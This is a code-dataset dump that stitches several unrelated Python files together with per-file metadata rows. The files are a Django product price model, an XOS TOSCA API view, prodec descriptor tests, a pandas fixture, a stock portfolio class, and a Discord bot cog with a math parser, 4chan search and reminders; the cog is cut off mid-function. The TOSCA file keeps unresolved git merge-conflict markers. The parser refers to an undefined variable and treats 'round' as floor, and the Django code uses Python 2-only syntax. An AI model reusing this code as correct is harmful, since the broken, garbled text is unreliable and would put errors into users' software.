raise ValidationError('Price cannot be negative')
if self.price_drop < 0 or self.price_drop > 100:
raise ValidationError('Price drop out of range of 0-100%')
def __str__(self):
return self.headline
# only save if price changes
def save(self, **kwargs):
if Product.objects.filter(pid=self.pid).exists():
current = Product.objects.get(pid=self.pid)
dict_new = model_to_dict(self)
dict_current = model_to_dict(current)
diff = filter(lambda (k, v): v != dict_new[k] and k != 'last_modified' and k != 'price', dict_current.items())
new_price = Decimal("%.2f" % self.price)
self.price = new_price
if current.price != new_price:
if current.price > new_price:
self.price_drop = int((current.price - new_price) / current.price * 100)
else:
self.price_drop = 0
diff.append('price')
if len(diff) > 0:
self.clean()
super(Product, self).save(**kwargs)
else:
self.price = Decimal("%.2f" % self.price)
self.clean()
super(Product, self).save(**kwargs)
class Meta:
verbose_name = "Product"
class PriceHistoryManager(models.Manager):
def price_history(self, product):
return self.get_queryset().filter(product__pid=product.pid).order_by('timestamp')
def min(self, product):
min_price = self.get_queryset().filter(product__pid=product.pid).aggregate(min_price=models.Min('price'))['min_price']
return self.get_queryset().filter(product__pid=product.pid).filter(price=min_price).order_by('-timestamp')[0]
def max(self, product):
max_price = self.get_queryset().filter(product__pid=product.pid).aggregate(max_price=models.Max('price'))['max_price']
return self.get_queryset().filter(product__pid=product.pid).filter(price=max_price).order_by('-timestamp')[0]
def last_n(self, product, n):
return self.get_queryset().filter(product__pid=product.pid).order_by('-timestamp')[:n]
class PriceHistory(models.Model):
product = models.ForeignKey(Product)
price = models.DecimalField(max_digits=9, decimal_places=2, verbose_name="Product Price")
timestamp = models.DateTimeField()
objects = PriceHistoryManager()
class Meta:
verbose_name = "Price History"
class ClickLogManager(models.Manager):
def expired(self, cutoff_time):
return self.get_queryset().filter(timestamp__lt = cutoff_time)
class ClickLog(models.Model):
product = models.ForeignKey(Product, db_index=False)
timestamp = models.DateTimeField()
objects = ClickLogManager()
class Meta:
verbose_name = "Price Check Log"
| 36.9375 | 126 | 0.664491 | 519 | 4,137 | 5.119461 | 0.238921 | 0.045164 | 0.050809 | 0.055326 | 0.388032 | 0.358675 | 0.270606 | 0.24426 | 0.188935 | 0.188935 | 0 | 0.01203 | 0.21634 | 4,137 | 111 | 127 | 37.27027 | 0.807526 | 0.019821 | 0 | 0.166667 | 0 | 0 | 0.084712 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.051282 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
57b46ec2e0dade46c77d1fce41a387fa6b810a5f | 1,890 | py | Python | xos/api/utility/toscaapi.py | iecedge/xos | 566617f676fedcb2602266191c755d191b37018a | [
"Apache-2.0"
] | null | null | null | xos/api/utility/toscaapi.py | iecedge/xos | 566617f676fedcb2602266191c755d191b37018a | [
"Apache-2.0"
] | null | null | null | xos/api/utility/toscaapi.py | iecedge/xos | 566617f676fedcb2602266191c755d191b37018a | [
"Apache-2.0"
] | null | null | null | # Copyright 2017-present Open Networking Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import sys
import traceback
# The Tosca engine expects to be run from /opt/xos/tosca/ or equivalent. It
# needs some sys.path fixing up.
import inspect
currentdir = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))
toscadir = os.path.join(currentdir, "../../tosca")
class ToscaViewSet(XOSViewSet):
base_name = "tosca"
method_name = "tosca"
method_kind = "viewset"
@classmethod
def get_urlpatterns(self, api_path="^"):
patterns = []
patterns.append(self.list_url("run/$", {"post": "post_run"}, "tosca_run"))
return patterns
def post_run(self, request):
recipe = request.data.get("recipe", None)
sys_path_save = sys.path
try:
sys.path.append(toscadir)
from tosca.engine import XOSTosca
xt = XOSTosca(recipe, parent_dir=toscadir, log_to_console=False)
xt.execute(request.user)
except BaseException:
return Response({"error_text": traceback.format_exc()}, status=500)
finally:
sys.path = sys_path_save
<<<<<<< HEAD
return Response( {"log_msgs": xt.log_msgs} )
=======
return Response({"log_msgs": xt.log_msgs})
>>>>>>> 045b63d3a... [SEBA-412] Automated reformat of Python code
| 30.983607 | 86 | 0.679894 | 250 | 1,890 | 5.052 | 0.576 | 0.047506 | 0.020586 | 0.025337 | 0.047506 | 0.047506 | 0.047506 | 0 | 0 | 0 | 0 | 0.013369 | 0.208466 | 1,890 | 60 | 87 | 31.5 | 0.830882 | 0.355556 | 0 | 0.0625 | 0 | 0 | 0.072379 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.15625 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
57b8a501dc93a41633bfea6eb1b0e55e7388ace2 | 4,041 | py | Python | tests/test_descriptor.py | OlivierBeq/ProDEC | b3723bc54a5a7ab4eedf2ab9a23a210e935b05fe | [
"MIT"
] | null | null | null | tests/test_descriptor.py | OlivierBeq/ProDEC | b3723bc54a5a7ab4eedf2ab9a23a210e935b05fe | [
"MIT"
] | null | null | null | tests/test_descriptor.py | OlivierBeq/ProDEC | b3723bc54a5a7ab4eedf2ab9a23a210e935b05fe | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""Tests for Descriptor."""
import unittest
import numpy as np
import orjson
from prodec import Descriptor
from prodec.utils import std_amino_acids
from tests.constants import *
class TestDescriptor(unittest.TestCase):
"""Tests for Descriptor."""
def setUp(self):
"""Create custom descriptor for testing"""
# Values below obtained at random
self.replacements = {'A': [6.0, 3.0, 12.1], 'C': [120.6, -12.2, -0.0001],
'D': [-3.8, 2.1, 0.9], 'E': [-91.24, -82.82, 77.79 ],
'F': [0.12, 3.0, 4.0], 'G': [-77.87, -75.44, 30.11 ],
'H': [47.73, -77.07, -34.83], 'I': [14.22, 97.13, -87.40 ],
'K': [ 64.98, 48.73, -62.02], 'L': [-13.98, -31.64, 5.04 ],
'M': [-78.57, -90.04, 17.60], 'N': [ -83.47, -58.43, -21.13 ],
'P': [-52.18, 52.58, 74.57], 'Q': [-36.21, -62.56, -56.08 ],
'R': [ 86.56, 26.16, 69.17], 'S': [34.89, -87.35, 37.82 ],
'T': [-13.67, -93.15, -2.88], 'V': [68.36, 67.60, -66.56 ],
'W': [-48.21, -42.47, -84.41], 'Y': [-90.24, 44.75, 2.18 ]}
self.definition = CSTM_DATA_NULL
for aa in std_amino_acids:
self.definition = self.definition.replace(f'{aa}_value', f'"{aa}" : {self.replacements[aa]}')
self.desc = Descriptor(orjson.loads(self.definition))
def test_descriptor_loaded_ID(self):
self.assertEqual(self.desc.ID, 'CSTM_TESTS')
def test_descriptor_loaded_Type(self):
self.assertEqual(self.desc.Type, 'Linear')
def test_descriptor_loaded_Name(self):
self.assertEqual(self.desc.Name, 'TEST')
def test_descriptor_summary(self):
self.assertEqual(self.desc.summary, {'Authors': None, 'Year':None,
'Journal':None, 'DOI':None,
'PMID':None, 'Patent':None})
def test_descriptor_loaded_Scales_Names_type(self):
self.assertIsInstance(self.desc.Scales_names, list)
def test_descriptor_loaded_Scales_Names(self):
self.assertListEqual(self.desc.Scales_names, [ 'v1', 'v2', 'v3' ])
def test_descriptor_definition(self):
self.assertEqual(self.desc.definition, self.replacements)
def test_descriptor_is_sequence_valid_default(self):
self.assertTrue(self.desc.is_sequence_valid(DFLT_SEQ))
def test_descriptor_is_sequence_valid_stupid(self):
self.assertFalse(self.desc.is_sequence_valid(STUPID_SEQ))
def test_descriptor_get_flattened_type(self):
result = self.desc.get(DFLT_SEQ, True, 0)
self.assertIsInstance(result, list)
def test_descriptor_get_not_flattened_type(self):
result = self.desc.get(DFLT_SEQ, False, 0)
self.assertIsInstance(result, list)
def test_descriptor_get_flattened_shape(self):
result = np.array(self.desc.get(DFLT_SEQ, True, 0)).shape
self.assertEqual(result[0], 3 * len(DFLT_SEQ))
def test_descriptor_get_not_flattened_type(self):
result = np.array(self.desc.get(DFLT_SEQ, False, 0)).shape
self.assertTrue(result[0] == len(DFLT_SEQ) and result[1] == 3)
def test_descriptor_get_flattened_value(self):
result = self.desc.get(DFLT_SEQ, True, 0)
self.assertAlmostEqual(np.mean(result), -9.968835, 6)
self.assertAlmostEqual(np.sum(result), -598.1301, 4)
self.assertAlmostEqual(np.std(result), 56.753686, 6)
def test_descriptor_get_not_flattened_value(self):
result = self.desc.get(DFLT_SEQ, True, 0)
self.assertAlmostEqual(np.mean(result), -9.968835, 6)
self.assertAlmostEqual(np.sum(result), -598.1301, 4)
self.assertAlmostEqual(np.std(result), 56.753686, 6)
def test_descriptor_get_empty_value(self):
result = self.desc.get('', True, 0)
self.assertListEqual(result, []) | 42.536842 | 105 | 0.59218 | 548 | 4,041 | 4.208029 | 0.332117 | 0.058977 | 0.117953 | 0.060711 | 0.476583 | 0.369471 | 0.299653 | 0.292715 | 0.292715 | 0.179965 | 0 | 0.095033 | 0.25266 | 4,041 | 95 | 106 | 42.536842 | 0.668543 | 0.033408 | 0 | 0.19403 | 0 | 0 | 0.030591 | 0.005913 | 0 | 0 | 0 | 0 | 0.298507 | 1 | 0.253731 | false | 0 | 0.089552 | 0 | 0.358209 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
57c14c8998061fad84c8b010eef9803262de092d | 328 | py | Python | pandas_selectable/tests/conftest.py | jseabold/pandas-select | 0dc5fac465db8348bf3d1cc69d9f7c4fe28896e1 | [
"BSD-3-Clause"
] | 28 | 2020-09-08T04:38:01.000Z | 2022-02-05T21:47:52.000Z | pandas_selectable/tests/conftest.py | jseabold/pandas-select | 0dc5fac465db8348bf3d1cc69d9f7c4fe28896e1 | [
"BSD-3-Clause"
] | 8 | 2020-09-04T21:29:57.000Z | 2021-11-17T16:44:42.000Z | pandas_selectable/tests/conftest.py | jseabold/pandas-select | 0dc5fac465db8348bf3d1cc69d9f7c4fe28896e1 | [
"BSD-3-Clause"
] | null | null | null | import numpy as np
import pandas as pd
import pytest
@pytest.fixture
def dta():
return pd.DataFrame.from_dict(
{
'A': np.arange(1, 16),
'B': pd.date_range('2020-01-01', periods=15),
'C': ['A', 'B', 'C'] * 5,
'D': pd.Categorical(['A', 'B', 'C'] * 5),
}
)
| 20.5 | 57 | 0.466463 | 45 | 328 | 3.355556 | 0.644444 | 0.02649 | 0.039735 | 0.05298 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.068807 | 0.335366 | 328 | 15 | 58 | 21.866667 | 0.623853 | 0 | 0 | 0 | 0 | 0 | 0.060976 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.076923 | true | 0 | 0.230769 | 0.076923 | 0.384615 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
57c4c8bc27d5ede3ee5ab749d40ffd70c1be34a7 | 1,474 | py | Python | api/classes/portfolio.py | alexander-schilling/fintual_test | 3a8a3cd17dea4a7a1203eb1cd58a2af411700207 | [
"MIT"
] | null | null | null | api/classes/portfolio.py | alexander-schilling/fintual_test | 3a8a3cd17dea4a7a1203eb1cd58a2af411700207 | [
"MIT"
] | null | null | null | api/classes/portfolio.py | alexander-schilling/fintual_test | 3a8a3cd17dea4a7a1203eb1cd58a2af411700207 | [
"MIT"
] | null | null | null | from .stock import Stock
class Portfolio:
def __init__(self, assets):
self.stocks = []
self.__populate_stocks(assets)
def get_stock(self, stock_name):
for stock in self.stocks:
if stock.name == stock_name:
return stock
return None
def get_profit(self, start_date, end_date):
initial_value = 0
final_value = 0
for stock in self.stocks:
initial_value += stock.get_price_from_date(start_date)
final_value += stock.get_price_from_date(end_date)
return self.__calculate_annualized_return(initial_value, final_value)
def add_stock(self, stock_name, stock_id):
self.stocks.append(Stock(stock_name, stock_id))
def remove_stock(self, stock_name):
for stock in self.stocks:
if stock.name == stock_name:
self.stocks.remove(stock)
def toggle_stock(self, stock_name, stock_id):
stock = self.get_stock(stock_name)
if stock is not None:
self.remove_stock(stock_name)
else:
self.add_stock(stock_name, stock_id)
def __populate_stocks(self, assets):
for asset in assets:
self.stocks.append(Stock(asset["name"], asset["id"]))
def __calculate_annualized_return(self, initial_value, final_value):
try:
return (final_value - initial_value) / initial_value * 100
except:
return 0
| 28.901961 | 77 | 0.627544 | 188 | 1,474 | 4.595745 | 0.218085 | 0.125 | 0.097222 | 0.083333 | 0.331019 | 0.30787 | 0.134259 | 0.134259 | 0.134259 | 0.134259 | 0 | 0.005731 | 0.289688 | 1,474 | 50 | 78 | 29.48 | 0.819484 | 0 | 0 | 0.135135 | 0 | 0 | 0.004071 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.216216 | false | 0 | 0.027027 | 0 | 0.405405 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
57c8b90994148c8460b99ab3bc8d5a19736e8281 | 25,325 | py | Python | cogs/general.py | xthecoolboy/MizaBOT | fb8a449bde29fdf1d32b5a597e48e6b3463dd867 | [
"MIT"
] | null | null | null | cogs/general.py | xthecoolboy/MizaBOT | fb8a449bde29fdf1d32b5a597e48e6b3463dd867 | [
"MIT"
] | null | null | null | cogs/general.py | xthecoolboy/MizaBOT | fb8a449bde29fdf1d32b5a597e48e6b3463dd867 | [
"MIT"
] | null | null | null | import discord
from discord.ext import commands
import asyncio
import aiohttp
import random
from datetime import datetime, timedelta
import math
import json
# #####################################################################################
# math parser used by $calc
class MathParser:
def __init__(self):
self.expression = ""
self.index = 0
self.vars = {}
self.funcs = ['cos', 'sin', 'tan', 'acos', 'asin', 'atan', 'cosh', 'sinh', 'tanh', 'acosh', 'asinh', 'atanh', 'exp', 'ceil', 'abs', 'factorial', 'floor', 'round', 'trunc', 'log', 'log2', 'log10', 'sqrt', 'rad', 'deg']
def evaluate(self, expression = "", vars={}):
self.expression = expression.replace(' ', '').replace('\t', '').replace('\n', '').replace('\r', '')
self.index = 0
self.vars = {
'pi' : 3.141592653589793,
'e' : 2.718281828459045
}
self.vars = {**self.vars, **vars}
for func in self.funcs:
if func in self.vars: raise Exception("Variable name '{}' can't be used".format(func))
value = float(self.parse())
if self.isNotDone(): raise Exception("Unexpected character '{}' found at index {}".format(self.peek(), self.index))
epsilon = 0.0000000001
if int(value) == value: return int(value)
elif int(value + epsilon) != int(value):
return int(value + epsilon)
elif int(value - epsilon) != int(value):
return int(value)
return value
def isNotDone(self):
return self.index < len(self.expression)
def peek(self):
return self.expression[self.index:self.index + 1]
def parse(self):
values = [self.multiply()]
while True:
c = self.peek()
if c in ['+', '-']:
self.index += 1
if c == '-': values.append(- self.multiply())
else: values.append(self.multiply())
else:
break
return sum(values)
def multiply(self):
values = [self.parenthesis()]
while True:
c = self.peek()
if c in ['*', 'x']:
self.index += 1
values.append(self.parenthesis())
elif c in ['/', '%']:
div_index = self.index
self.index += 1
denominator = self.parenthesis()
if denominator == 0:
raise Exception("Division by 0 occured at index {}".format(div_index))
if c == '/': values.append(1.0 / denominator)
else: values.append(1.0 % denominator)
elif c == '^':
self.index += 1
exponent = self.parenthesis()
values[-1] = values[-1] ** exponent
elif c == '!':
self.index += 1
values[-1] = math.factorial(values[-1])
else:
break
value = 1.0
for factor in values: value *= factor
return value
def parenthesis(self):
if self.peek() == '(':
self.index += 1
value = self.parse()
if self.peek() != ')': raise Exception("No closing parenthesis found at character {}".format(self.index))
self.index += 1
return value
else:
return self.negative()
def negative(self):
if self.peek() == '-':
self.index += 1
return -1 * self.parenthesis()
else:
return self.value()
def value(self):
if self.peek() in '0123456789.':
return self.number()
else:
return self.variable_or_function()
def variable_or_function(self):
var = ''
while self.isNotDone():
c = self.peek()
if c.lower() in '_abcdefghijklmnopqrstuvwxyz0123456789':
var += c
self.index += 1
else:
break
value = self.vars.get(var, None)
if value == None:
if var not in self.funcs: raise Exception("Unrecognized variable '{}'".format(var))
else:
param = self.parenthesis()
if var == 'cos': value = math.cos(param)
elif var == 'sin': value = math.sin(param)
elif var == 'tan': value = math.tan(param)
elif var == 'acos': value = math.acos(param)
elif var == 'asin': value = math.asin(param)
elif var == 'atan': value = math.atan(param)
elif var == 'cosh': value = math.cosh(param)
elif var == 'sinh': value = math.sinh(param)
elif var == 'tanh': value = math.tanh(param)
elif var == 'acosh': value = math.acosh(param)
elif var == 'asinh': value = math.asinh(param)
elif var == 'atanh': value = math.atanh(param)
elif var == 'exp': value = math.exp(param)
elif var == 'ceil': value = math.ceil(param)
elif var == 'floor': value = math.floor(param)
elif var == 'round': value = math.floor(param)
elif var == 'factorial': value = math.factorial(param)
elif var == 'abs': value = math.fabs(param)
elif var == 'trunc': value = math.trunc(param)
elif var == 'log':
if param <= 0: raise Exception("Can't evaluate the logarithm of '{}'".format(param))
value = math.log(param)
elif var == 'log2':
if param <= 0: raise Exception("Can't evaluate the logarithm of '{}'".format(param))
value = math.log2(param)
elif var == 'log10':
if param <= 0: raise Exception("Can't evaluate the logarithm of '{}'".format(param))
value = math.log10(param)
elif var == 'sqrt': value = math.sqrt(param)
elif var == 'rad': value = math.radians(param)
elif var == 'deg': value = math.degrees(param)
else: raise Exception("Unrecognized function '{}'".format(var))
return float(value)
def number(self):
strValue = ''
decimal_found = False
c = ''
while self.isNotDone():
c = self.peek()
if c == '.':
if decimal_found:
raise Exception("Found an extra period in a number at character {}".format(self.index))
decimal_found = True
strValue += '.'
elif c in '0123456789':
strValue += c
else:
break
self.index += 1
if len(strValue) == 0:
if c == '': raise Exception("Unexpected end found")
else: raise Exception("A number was expected at character {} but instead '{}' was found".format(self.index, char))
return float(strValue)
# #####################################################################################
# Cogs
class General(commands.Cog):
"""General commands."""
def __init__(self, bot):
self.bot = bot
self.color = 0x8fe3e8
def startTasks(self):
self.bot.runTask('reminder', self.remindertask)
async def remindertask(self):
while True:
if self.bot.exit_flag: return
try:
c = self.bot.getJST() + timedelta(seconds=30)
for r in list(self.bot.reminders.keys()):
di = 0
u = self.bot.get_user(int(r))
if u is None: continue
while di < len(self.bot.reminders[r]):
if c > self.bot.reminders[r][di][0]:
try:
await u.send(embed=self.bot.buildEmbed(title="Reminder", description=self.bot.reminders[r][di][1]))
except Exception as e:
await self.bot.sendError('remindertask', "User: {}\nReminder: {}\nError: {}".format(u.name, self.bot.reminders[r][di][1], e))
self.bot.reminders[r].pop(di)
self.bot.savePending = True
else:
di += 1
if len(self.bot.reminders[r]) == 0:
self.bot.reminders.pop(r)
self.bot.savePending = True
except asyncio.CancelledError:
await self.bot.sendError('remindertask', 'cancelled')
return
except Exception as e:
await self.bot.sendError('remindertask', str(e))
await asyncio.sleep(200)
await asyncio.sleep(40)
def isDisabled(): # for decorators
async def predicate(ctx):
return False
return commands.check(predicate)
def isAuthorized(): # for decorators
async def predicate(ctx):
return ctx.bot.isAuthorized(ctx)
return commands.check(predicate)
# get a 4chan thread
async def get4chan(self, board : str, search : str): # be sure to not abuse it, you are not supposed to call the api more than once per second
try:
search = search.lower()
url = 'http://a.4cdn.org/{}/catalog.json'.format(board) # board catalog url
async with aiohttp.ClientSession() as session:
async with session.get(url) as r:
if r.status == 200:
data = await r.json()
threads = []
for p in data:
for t in p["threads"]:
try:
if t["sub"].lower().find(search) != -1 or t["com"].lower().find(search) != -1:
threads.append([t["no"], t["replies"]]) # store the thread ids matching our search word
except:
pass
threads.sort(reverse=True)
return threads
except:
return []
@commands.command(no_pm=True, cooldown_after_parsing=True)
@isAuthorized()
async def roll(self, ctx, dice : str = ""):
"""Rolls a dice in NdN format."""
try:
rolls, limit = map(int, dice.split('d'))
result = ", ".join(str(random.randint(1, limit)) for r in range(rolls))
await ctx.send(embed=self.bot.buildEmbed(title="{}'s dice Roll(s)".format(ctx.message.author.display_name), description=result, color=self.color))
except:
await ctx.send(embed=self.bot.buildEmbed(title="Format has to be in NdN", footer="example: roll 2d6", color=self.color))
@commands.command(no_pm=True, cooldown_after_parsing=True, aliases=['choice'])
@isAuthorized()
@commands.cooldown(2, 10, commands.BucketType.guild)
async def choose(self, ctx, *, choices : str ):
"""Chooses between multiple choices.
Use quotes if one of your choices contains spaces.
Example: $choose I'm Alice ; Bob"""
try:
possible = choices.split(";")
if len(possible) < 2: raise Exception()
await ctx.send(embed=self.bot.buildEmbed(title="{}, I choose".format(ctx.message.author.display_name), description=random.choice(possible), color=self.color))
except:
await ctx.send(embed=self.bot.buildEmbed(title="Give me a list of something to choose from 😔, separated by ';'", color=self.color))
@commands.command(no_pm=True, cooldown_after_parsing=True, aliases=['math'])
@commands.cooldown(2, 10, commands.BucketType.guild)
async def calc(self, ctx, *terms : str):
"""Process a mathematical expression
You can define a variable by separating using a comma.
Some functions are also available.
Example: cos(a + b) / c, a = 1, b=2,c = 3"""
try:
m = " ".join(terms).split(",")
d = {}
for i in range(1, len(m)): # process the variables if any
x = m[i].replace(" ", "").split("=")
if len(x) == 2: d[x[0]] = float(x[1])
else: raise Exception('')
msg = "{} = **{}**".format(m[0], MathParser().evaluate(m[0], d))
if len(d) > 0:
msg += "\nwith:\n"
for k in d:
msg += "{} = {}\n".format(k, d[k])
await ctx.send(embed=self.bot.buildEmbed(title="Calculator", description=msg, color=self.color))
except Exception as e:
await ctx.send(embed=self.bot.buildEmbed(title="Error", description=str(e), color=self.color))
@commands.command(no_pm=True, cooldown_after_parsing=True)
@commands.cooldown(1, 5, commands.BucketType.guild)
async def jst(self, ctx):
"""Post the current time, JST timezone"""
await ctx.send(embed=self.bot.buildEmbed(title="{} {:%Y/%m/%d %H:%M} JST".format(self.bot.getEmote('clock'), self.bot.getJST()), color=self.color))
@commands.command(no_pm=True, cooldown_after_parsing=True, alias=['inrole', 'rolestat'])
@isAuthorized()
async def roleStats(self, ctx, *name : str):
"""Search how many users have a matching role
use quotes if your match contain spaces
add 'exact' at the end to force an exact match"""
g = ctx.author.guild
i = 0
if len(name) > 0 and name[-1] == "exact":
exact = True
name = name[:-1]
else:
exact = False
name = ' '.join(name)
for member in g.members:
for r in member.roles:
if r.name == name or (exact == False and r.name.lower().find(name.lower()) != -1):
i += 1
if exact != "exact":
await ctx.send(embed=self.bot.buildEmbed(title="Roles containing: {}".format(name), description="{} user(s)".format(i), thumbnail=g.icon_url, footer="on server {}".format(g.name), color=self.color))
else:
await ctx.send(embed=self.bot.buildEmbed(title="Roles matching: {}".format(name), description="{} user(s)".format(i), thumbnail=g.icon_url, footer="on server {}".format(g.name), color=self.color))
@commands.command(no_pm=True, cooldown_after_parsing=True, aliases=['hgg2d'])
@commands.cooldown(1, 10, commands.BucketType.default)
async def hgg(self, ctx):
"""Post the latest /hgg2d/ threads"""
if not ctx.channel.is_nsfw():
await ctx.send(embed=self.bot.buildEmbed(title=':underage: NSFW channels only'))
return
threads = await self.get4chan('vg', '/hgg2d/')
if len(threads) > 0:
msg = ""
for t in threads:
msg += '🔞 https://boards.4channel.org/vg/thread/{} ▫️ *{} replies*\n'.format(t[0], t[1])
await ctx.send(embed=self.bot.buildEmbed(title="/hgg2d/ latest thread(s)", description=msg, footer="Good fap, fellow 4channeler", color=self.color))
else:
await ctx.send(embed=self.bot.buildEmbed(title="/hgg2d/ Error", description="I couldn't find a single /hgg2d/ thread 😔", color=self.color))
@commands.command(no_pm=True, cooldown_after_parsing=True, aliases=['thread'])
@commands.cooldown(1, 3, commands.BucketType.default)
async def gbfg(self, ctx):
"""Post the latest /gbfg/ threads"""
threads = await self.get4chan('vg', '/gbfg/')
if len(threads) > 0:
msg = ""
for t in threads:
msg += ':poop: https://boards.4channel.org/vg/thread/{} ▫️ *{} replies*\n'.format(t[0], t[1])
await ctx.send(embed=self.bot.buildEmbed(title="/gbfg/ latest thread(s)", description=msg, footer="Have fun, fellow 4channeler", color=self.color))
else:
await ctx.send(embed=self.bot.buildEmbed(title="/gbfg/ Error", description="I couldn't find a single /gbfg/ thread 😔", color=self.color))
@commands.command(no_pm=True, cooldown_after_parsing=True, name='4chan')
@commands.cooldown(1, 3, commands.BucketType.default)
async def _4chan(self, ctx, board : str, *, term : str):
"""Search 4chan threads"""
nsfw = ['b', 'r9k', 'pol', 'bant', 'soc', 's4s', 's', 'hc', 'hm', 'h', 'e', 'u', 'd', 'y', 't', 'hr', 'gif', 'aco', 'r']
board = board.lower()
if board in nsfw and not ctx.channel.is_nsfw():
await ctx.send(embed=self.bot.buildEmbed(title=":underage: The board `{}` is restricted to NSFW channels".format(board)))
return
threads = await self.get4chan(board, term)
if len(threads) > 0:
msg = ""
for t in threads:
msg += ':four_leaf_clover: https://boards.4channel.org/{}/thread/{} ▫️ *{} replies*\n'.format(board, t[0], t[1])
await ctx.send(embed=self.bot.buildEmbed(title="4chan Search result", description=msg, footer="Have fun, fellow 4channeler", color=self.color))
else:
await ctx.send(embed=self.bot.buildEmbed(title="4chan Search result", description="No matching threads found", color=self.color))
@commands.command(no_pm=True, cooldown_after_parsing=True, aliases=['reminder'])
@commands.cooldown(1, 3, commands.BucketType.user)
async def remind(self, ctx, duration : str, *, msg : str):
"""Remind you of something at the specified time (±30 seconds precision)
<duration> format: XdXhXmXs for day, hour, minute, second, each are optionals"""
id = str(ctx.author.id)
if id not in self.bot.reminders:
self.bot.reminders[id] = []
if len(self.bot.reminders[id]) >= 5 and ctx.author.id != self.bot.ids.get('owner', -1):
await ctx.send(embed=self.bot.buildEmbed(title="Reminder Error", description="Sorry, I'm limited to 5 reminders per user 🙇", color=self.color))
return
try:
d = self.bot.makeTimedelta(duration)
if d is None: raise Exception()
except:
await ctx.send(embed=self.bot.buildEmbed(title="Reminder Error", description="Invalid duration string `{}`, format is `NdNhNm`".format(duration), color=self.color))
return
if msg == "":
await ctx.send(embed=self.bot.buildEmbed(title="Reminder Error", description="Tell me what I'm supposed to remind you 🤔", color=self.color))
return
if len(msg) > 200:
await ctx.send(embed=self.bot.buildEmbed(title="Reminder Error", description="Reminders are limited to 200 characters", color=self.color))
return
try:
self.bot.reminders[id].append([datetime.utcnow().replace(microsecond=0) + timedelta(seconds=32400) + d, msg]) # keep JST
self.bot.savePending = True
await ctx.message.add_reaction('✅') # white check mark
except:
await ctx.send(embed=self.bot.buildEmbed(title="Reminder Error", footer="I have no clues about what went wrong", color=self.color))
@commands.command(no_pm=True, cooldown_after_parsing=True, aliases=['rl', 'reminderlist'])
@commands.cooldown(1, 6, commands.BucketType.user)
async def remindlist(self, ctx):
"""Post your current list of reminders"""
id = str(ctx.author.id)
if id not in self.bot.reminders or len(self.bot.reminders[id]) == 0:
await ctx.send(embed=self.bot.buildEmbed(title="Reminder Error", description="You don't have any reminders", color=self.color))
else:
embed = discord.Embed(title="{}'s Reminder List".format(ctx.author.display_name), color=random.randint(0, 16777216)) # random color
embed.set_thumbnail(url=ctx.author.avatar_url)
for i in range(0, len(self.bot.reminders[id])):
embed.add_field(name="#{} ▫️ {:%Y/%m/%d %H:%M} JST".format(i, self.bot.reminders[id][i][0]), value=self.bot.reminders[id][i][1], inline=False)
await ctx.send(embed=embed)
@commands.command(no_pm=True, cooldown_after_parsing=True, aliases=['rd', 'reminderdel'])
@commands.cooldown(2, 3, commands.BucketType.user)
async def reminddel(self, ctx, rid : int):
"""Delete one of your reminders"""
id = str(ctx.author.id)
if id not in self.bot.reminders or len(self.bot.reminders[id]) == 0:
await ctx.send(embed=self.bot.buildEmbed(title="Reminder Error", description="You don't have any reminders", color=self.color))
else:
if rid < 0 or rid >= len(self.bot.reminders[id]):
await ctx.send(embed=self.bot.buildEmbed(title="Reminder Error", description="Invalid id `{}`".format(rid), color=self.color))
else:
self.bot.reminders[id].pop(rid)
if len(self.bot.reminders[id]) == 0:
self.bot.reminders.pop(id)
self.bot.savePending = True
await ctx.message.add_reaction('✅') # white check mark
@commands.command(no_pm=True, cooldown_after_parsing=True)
@isAuthorized()
@commands.cooldown(1, 1, commands.BucketType.user)
async def iam(self, ctx, *, role_name : str):
"""Add a role to you that you choose. Role must be on a list of self-assignable roles."""
g = str(ctx.guild.id)
roles = self.bot.assignablerole.get(g, {})
if role_name.lower() not in roles:
await ctx.message.add_reaction('❎') # negative check mark
else:
id = roles[role_name.lower()]
r = ctx.guild.get_role(id)
if r is None: # role doesn't exist anymore
await ctx.message.add_reaction('❎') # negative check mark
self.bot.assignablerole[g].pop(role_name.lower())
if len(self.bot.assignablerole[g]) == 0:
self.bot.assignablerole.pop(g)
self.bot.savePending = True
else:
try:
